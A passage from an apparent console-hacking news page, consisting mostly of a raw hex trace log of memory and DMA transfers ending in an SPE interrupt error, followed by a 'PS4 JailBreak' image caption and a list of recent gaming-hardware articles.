00002933 - 0047: 0x0000020000509890 <- 0x3E000 00 00 00 00 00 00 00 00 (0x8)
00002970 - 0048: 0x000002400008E004 -> 0x3E004 00 00 00 02 (0x4)
00003006 - 0049: 0x000002400008DFF2 -> 0x3E002 00 04 (0x2)
00003062 - 004A: 0x000002400008CFF6 -> 0x3E006 00 04 (0x2)
00003095 - 004B: 0x000002400008D000 <- 0x3E000 12 01 00 04 00 00 80 17 00 00 00 00 00 02 00 02 20 10 00 00 00 00 FF 1E 00 00 00 A0 00 00 00 A0 (0x20)
00003179 - 004C: 0x000002400008DFF0 <- 0x3E000 00 05 00 05 (0x4)
00003217 - 004D: 0x000002400008E100 <- 0x3E000 00 00 00 01 (0x4)
00003249 - 004E: 0x000002400008E004 -> 0x3E004 00 00 00 02 (0x4)
RESPONSE: 12 01 00 04 00 00 80 17 00 00 00 00 00 0C 00 0C 20 00 00 00 43 79 74 33 2E 32 00 00 FF FF FD 57
00003321 - 004F: 0x000002400008CFF2 -> 0x3E002 00 05 (0x2)
00003350 - 0050: 0x000002400008DFF6 -> 0x3E006 00 04 (0x2)
00003384 - 0051: 0x000002400008CFF6 -> 0x3E006 00 05 (0x2)
00003413 - 0052: 0x000002400008CFF2 -> 0x3E002 00 05 (0x2)
00003446 - 0053: 0x000002400008DFF6 -> 0x3E006 00 04 (0x2)
00003475 - 0054: 0x000002400008C000 -> 0x3E000 12 01 00 04 00 00 80 17 00 00 00 00 00 0C 00 0C (0x10)
Reading header
00003523 - 0055: 0x000002400008C000 -> 0x3E000 12 01 00 04 00 00 80 17 00 00 00 00 00 0C 00 0C 20 00 00 00 43 79 74 33 2E 32 00 00 FF FF FD 57 (0x20)
Reading data 3
00003584 - 0056: 0x000002400008DFF4 <- 0x3E004 00 05 00 05 (0x4)
00003621 - 0057: 0x000002400008E100 <- 0x3E000 00 00 00 01 (0x4)
00003653 - 0058: 0x0000024000087000 -> 0x3E000 04 00 01 03 (0x4)
00003689 - 0059: 0x0000024000087000 -> 0x3E000 04 00 01 03 (0x4)
00003720 - 005A: 0x0000024000087000 -> 0x3E000 04 00 01 03 (0x4)
00003755 - 005B: 0x0000024000087000 -> 0x3E000 04 00 01 03 (0x4)
00003786 - 005C: 0x0000024000087000 -> 0x3E000 04 00 01 03 (0x4)
00003822 - 005D: 0x0000024001000038 <- 0x3E008 FF (0x1)
00003851 - 005E: 0x0000024001000028 <- 0x3E008 00 (0x1)
00003884 - 005F: 0x000002400008E004 -> 0x3E004 00 00 00 02 (0x4)
00003915 - 0060: 0x000002400008DFF2 -> 0x3E002 00 05 (0x2)
00003948 - 0061: 0x000002400008CFF6 -> 0x3E006 00 05 (0x2)
00003977 - 0062: 0x000002400008D000 <- 0x3E000 18 01 00 05 00 00 80 1E 00 00 00 00 00 02 00 02 01 1B 00 00 00 00 FF 24 2E 32 00 00 FF FF FD 57 (0x20)
00004049 - 0063: 0x000002400008DFF0 <- 0x3E000 00 06 00 06 (0x4)
00004081 - 0064: 0x000002400008E100 <- 0x3E000 00 00 00 01 (0x4)
00004117 - 0065: 0x000002400008E004 -> 0x3E004 00 00 00 02 (0x4)
RESPONSE: 18 01 00 05 00 00 80 1E 00 00 00 00 00 04 00 04 00 1B 02 00 FF FF FF 1F
00004177 - 0066: 0x000002400008CFF2 -> 0x3E002 00 06 (0x2)
00004210 - 0067: 0x000002400008DFF6 -> 0x3E006 00 05 (0x2)
00004239 - 0068: 0x000002400008CFF6 -> 0x3E006 00 06 (0x2)
00004273 - 0069: 0x000002400008CFF2 -> 0x3E002 00 06 (0x2)
00004302 - 006A: 0x000002400008DFF6 -> 0x3E006 00 05 (0x2)
00004335 - 006B: 0x000002400008C000 -> 0x3E000 18 01 00 05 00 00 80 1E 00 00 00 00 00 04 00 04 (0x10)
Reading header
00004379 - 006C: 0x000002400008C000 -> 0x3E000 18 01 00 05 00 00 80 1E 00 00 00 00 00 04 00 04 00 1B 02 00 FF FF FF 1F 2E 32 00 00 FF FF FD 57 (0x20)
Reading data 4
00004444 - 006D: 0x000002400008DFF4 <- 0x3E004 00 06 00 06 (0x4)
00004476 - 006E: 0x000002400008E100 <- 0x3E000 00 00 00 01 (0x4)
00004513 - 006F: 0x000002400008E004 -> 0x3E004 00 00 00 02 (0x4)
00004544 - 0070: 0x000002400008DFF2 -> 0x3E002 00 06 (0x2)
00004578 - 0071: 0x000002400008CFF6 -> 0x3E006 00 06 (0x2)
00004607 - 0072: 0x000002400008D000 <- 0x3E000 1B 01 00 06 00 00 80 22 00 00 00 00 00 02 00 02 10 00 00 00 00 00 FF 28 2E 32 00 00 FF FF FD 57 (0x20)
00004678 - 0073: 0x000002400008DFF0 <- 0x3E000 00 07 00 07 (0x4)
00004710 - 0074: 0x000002400008E100 <- 0x3E000 00 00 00 01 (0x4)
00004747 - 0075: 0x000002400008E004 -> 0x3E004 00 00 00 02 (0x4)
RESPONSE: 1B 01 00 06 00 00 80 22 00 00 00 00 00 01 00 01 00 00 00 00 FF FF FF 3A
00004806 - 0076: 0x000002400008CFF2 -> 0x3E002 00 07 (0x2)
00004840 - 0077: 0x000002400008DFF6 -> 0x3E006 00 06 (0x2)
00004869 - 0078: 0x000002400008CFF6 -> 0x3E006 00 07 (0x2)
00004902 - 0079: 0x000002400008CFF2 -> 0x3E002 00 07 (0x2)
00004931 - 007A: 0x000002400008DFF6 -> 0x3E006 00 06 (0x2)
00004964 - 007B: 0x000002400008C000 -> 0x3E000 1B 01 00 06 00 00 80 22 00 00 00 00 00 01 00 01 (0x10)
Reading header
00005039 - 007C: 0x000002400008C000 -> 0x3E000 1B 01 00 06 00 00 80 22 00 00 00 00 00 01 00 01 00 00 00 00 FF FF FF 3A 2E 32 00 00 FF FF FD 57 (0x20)
Reading data 5
00005105 - 007D: 0x000002400008DFF4 <- 0x3E004 00 07 00 07 (0x4)
00005138 - 007E: 0x000002400008E100 <- 0x3E000 00 00 00 01 (0x4)
00005174 - 007F: 0x0000020000500910 <- 0x3E000 00 00 00 00 00 00 00 00 (0x8)
00005212 - 0080: 0x0000020000500920 <- 0x3E000 FF FF FF FF FF FF FF FF (0x8)
00005252 - 0081: 0x0000020000500918 <- 0x3E008 00 00 00 00 00 00 00 00 (0x8)
00005290 - 0082: 0x0000020000500928 <- 0x3E008 FF FF FF FF FF FF FF FF (0x8)
00005330 - 0083: 0x0000020000500930 <- 0x3E000 00 00 00 00 00 00 00 00 (0x8)
00005368 - 0084: 0x0000020000500938 <- 0x3E008 C0 00 00 00 00 00 00 00 (0x8)
00005409 - 0085: 0x0000020000500B10 <- 0x3E000 00 00 00 00 00 00 00 00 (0x8)
00005446 - 0086: 0x0000020000500B20 <- 0x3E000 FF FF FF FF FF FF FF FF (0x8)
00005487 - 0087: 0x0000020000500B18 <- 0x3E008 00 00 00 00 00 00 00 00 (0x8)
00005524 - 0088: 0x0000020000500B28 <- 0x3E008 FF FF FF FF FF FF FF FF (0x8)
00005565 - 0089: 0x0000020000500B30 <- 0x3E000 00 00 00 00 00 00 00 00 (0x8)
00005602 - 008A: 0x0000020000500810 <- 0x3E000 00 00 00 00 00 00 00 00 (0x8)
00005644 - 008B: 0x0000020000500820 <- 0x3E000 FF FF FF FF FF FF FF FF (0x8)
00005680 - 008C: 0x0000020000500818 <- 0x3E008 00 00 00 00 00 00 00 40 (0x8)
00005721 - 008D: 0x0000020000500828 <- 0x3E008 FF FF FF FF FF FF FF FF (0x8)
00005758 - 008E: 0x0000020000500830 <- 0x3E000 00 00 00 00 00 00 00 00 (0x8)
00005799 - 008F: 0x0000020000500848 -> 0x3E008 00 00 00 00 00 00 00 00 (0x8)
00005835 - 0090: 0x0000020000500848 <- 0x3E008 00 00 00 00 00 00 00 04 (0x8)
00005876 - 0091: 0x000002000050A230 <- 0x3E000 00 00 00 00 00 00 00 00 (0x8)
00005914 - 0092: 0x000002000050A238 <- 0x3E008 00 00 00 00 00 00 00 00 (0x8)
00005955 - 0093: 0x0000020000508508 <- 0x3E008 00 00 00 00 00 00 00 00 (0x8)
00005993 - 0094: 0x0000020000508500 <- 0x3E000 FF FF FF FF FF FF FF FF (0x8)
00006033 - 0095: 0x0000020000508518 <- 0x3E008 00 00 00 00 00 00 00 00 (0x8)
00006070 - 0096: 0x0000020000508510 <- 0x3E000 00 00 00 00 00 00 00 00 (0x8)
00006112 - 0097: 0x0000020000509C38 -> 0x3E008 00 00 00 80 (0x4)
00006143 - 0098: 0x0000020000400388 <- 0x3E008 00 00 00 00 00 00 00 00 (0x8)
00006185 - 0099: 0x0000020000400390 <- 0x3E000 FF FF FF FF FF FF FF FF (0x8)
00006221 - 009A: 0x00000200004003A0 <- 0x3E000 00 00 00 00 00 00 00 00 (0x8)
00006263 - 009B: 0x00000200004003A8 <- 0x3E008 FF FF FF FF FF FF FF FF (0x8)
00006299 - 009C: 0x0000020000509C38 -> 0x3E008 00 00 00 80 (0x4)
00006334 - 009D: 0x0000020000400020 -> 0x3E000 54 54 54 54 54 54 54 54 (0x8)
00006368 - 009E: 0x00000200004003B0 <- 0x3E000 00 00 00 00 00 00 05 84 (0x8)
00006410 - 009F: 0x0000020000509C18 <- 0x3E008 00 00 01 30 (0x4)
00006442 - 00A0: 0x0000020000509C20 <- 0x3E000 FF FF FF FC (0x4)
00006478 - 00A1: 0x0000024000080310 <- 0x3E000 00 00 00 00 (0x4)
00006510 - 00A2: 0x0000024000080260 <- 0x3E000 00 00 00 00 (0x4)
00006547 - 00A3: 0x0000024000080264 <- 0x3E004 00 00 00 00 (0x4)
00006579 - 00A4: 0x0000024000080268 <- 0x3E008 00 00 00 00 (0x4)
00006615 - 00A5: 0x000002400008026C <- 0x3E00C 00 00 00 00 (0x4)
00006647 - 00A6: 0x0000024000080270 <- 0x3E000 00 00 00 00 (0x4)
00006683 - 00A7: 0x0000024000080274 <- 0x3E004 00 00 00 00 (0x4)
00006716 - 00A8: 0x0000024000080278 <- 0x3E008 00 00 00 00 (0x4)
00006752 - 00A9: 0x000002400008027C <- 0x3E00C 00 00 00 00 (0x4)
00006784 - 00AA: 0x00000240000800CC <- 0x3E00C 00 00 00 00 (0x4)
00006820 - 00AB: 0x00000240000800D0 <- 0x3E000 00 00 00 00 (0x4)
00006852 - 00AC: 0x00000240000800D4 <- 0x3E004 00 00 00 00 (0x4)
00006889 - 00AD: 0x00000240000800D8 <- 0x3E008 00 00 00 00 (0x4)
00006921 - 00AE: 0x00000240000800DC <- 0x3E00C 00 00 00 00 (0x4)
00006957 - 00AF: 0x00000240000800E0 <- 0x3E000 00 00 00 00 (0x4)
00006990 - 00B0: 0x0000024000087000 -> 0x3E000 04 00 01 03 (0x4)
00007026 - 00B1: 0x0000024000087020 -> 0x3E000 00 00 00 15 (0x4)
00007057 - 00B2: 0x0000024000087020 <- 0x3E000 00 00 00 15 (0x4)
00007116 - 00B3: 0x0000024000087030 -> 0x3E000 00 00 00 15 (0x4)
00007159 - 00B4: 0x0000024000087030 <- 0x3E000 00 00 00 15 (0x4)
00007195 - 00B5: 0x0000024000087030 -> 0x3E000 00 00 00 15 (0x4)
00007226 - 00B6: 0x00000240000011A8 <- 0x3E008 00 00 00 00 (0x4)
00007263 - 00B7: 0x0000024000002FA8 <- 0x3E008 00 00 00 00 (0x4)
00007295 - 00B8: 0x0000024000087000 -> 0x3E000 04 00 01 03 (0x4)
00007330 - 00B9: 0x000002400008E004 -> 0x3E004 00 00 00 02 (0x4)
00007362 - 00BA: 0x000002400008DFF2 -> 0x3E002 00 07 (0x2)
00007396 - 00BB: 0x000002400008CFF6 -> 0x3E006 00 07 (0x2)
00007425 - 00BC: 0x000002400008D000 <- 0x3E000 12 01 00 07 00 00 80 1A 00 00 00 00 00 02 00 02 02 00 00 00 00 00 FF 46 2E 32 00 00 FF FF FD 57 (0x20)
00007496 - 00BD: 0x000002400008DFF0 <- 0x3E000 00 08 00 08 (0x4)
00007529 - 00BE: 0x000002400008E100 <- 0x3E000 00 00 00 01 (0x4)
00007565 - 00BF: 0x000002400008E004 -> 0x3E004 00 00 00 02 (0x4)
RESPONSE: 12 01 00 07 00 00 80 1A 00 00 00 00 00 05 00 05 02 00 00 00 00 00 00 00 FF FF FF 40
00007629 - 00C0: 0x000002400008CFF2 -> 0x3E002 00 08 (0x2)
00007662 - 00C1: 0x000002400008DFF6 -> 0x3E006 00 07 (0x2)
00007691 - 00C2: 0x000002400008CFF6 -> 0x3E006 00 08 (0x2)
00007725 - 00C3: 0x000002400008CFF2 -> 0x3E002 00 08 (0x2)
00007754 - 00C4: 0x000002400008DFF6 -> 0x3E006 00 07 (0x2)
00007787 - 00C5: 0x000002400008C000 -> 0x3E000 12 01 00 07 00 00 80 1A 00 00 00 00 00 05 00 05 (0x10)
Reading header
00007831 - 00C6: 0x000002400008C000 -> 0x3E000 12 01 00 07 00 00 80 1A 00 00 00 00 00 05 00 05 02 00 00 00 00 00 00 00 FF FF FF 40 FF FF FD 57 (0x20)
Reading data 6
00007897 - 00C7: 0x000002400008DFF4 <- 0x3E004 00 08 00 08 (0x4)
00007929 - 00C8: 0x000002400008E100 <- 0x3E000 00 00 00 01 (0x4)
00007965 - 00C9: 0x0000020000511C00 <- 0x3E000 00 00 00 00 10 00 08 00 (0x8)
00008005 - 00CA: 0x0000020000509C90 <- 0x3E000 00 00 00 00 00 00 00 00 (0x8)
00008047 - 00CB: 0x0000000000511C00 -> 0x3E000 00 00 00 00 00 00 00 00 (0x8)
00008082 - 00CC: 0x0000000000511C00 <- 0x3E000 00 00 00 00 00 00 00 00 (0x8)
00008124 - 00CD: 0x0000000000510918 <- 0x3E008 00 00 00 00 00 00 00 00 (0x8)
SPE STOPPED 0x0
STATUS 2
CHECK 1
Unexpected interrupt class 1.[0000000000000008]. MFC PUT INTERRUPT
LSA CMP ADDR 3E008. Dir 1. QIDX: 0 [0x3E00880000000]
Entry 0. EA:0000000000510988. LS:3E018. Size: 001 (001). Command: 20. QW: 0
[0000000402000000][0000000000510000][F80400CC41000000][000002C400000A00]
Unexpected interrupt class 1.[0000000000000008]
ENDING MAIN LOOP:
CHECK 2
Unexpected interrupt class 2.[0000000000000012]
STATUS 2
MFCCNTL 10000004000
PS4 JailBreak.png
 

Comments

Recent Articles
Simple Wireless Rover for Raspberry Pi Controlled by PS4 DS4 via WiFi
Following the DJI Tello Drone and DeepRacer RC remote control PS4 DualShock 4 mods, recently Veilkrand on Github shared a Simple Wireless Rover for Raspberry Pi Controlled by PS4 DS4 via WiFi for...
Capcom Home Arcade Launches October 25th, Details and Trailer Video
Previously we covered the RetroEngine Sigma and Game Box Hero systems for emulation fans, and recently Capcom announced their Capcom Home Arcade launches this October 25th with pre-orders...
PS4 Retail Theme Unlocker Windows GUI Front-End by Backporter
Proceeding the PS4 DLC, Games, Updates & Themes Guide by @AluPL (aka TheRadziu on Twitter) today @Backporter shared via Twitter a PS4 Retail Theme Unlocker Windows GUI front-end...
PS4 Games Up to Half Off as PlayStation Plus Platinum Weekend Begins
This weekend PlayStation Plus members can save up to 50% off select PS4 games during Sony's PS Plus Platinum Weekend Sale with titles including Days Gone, Grand Theft Auto V, Rage 2 Deluxe Edition...
Top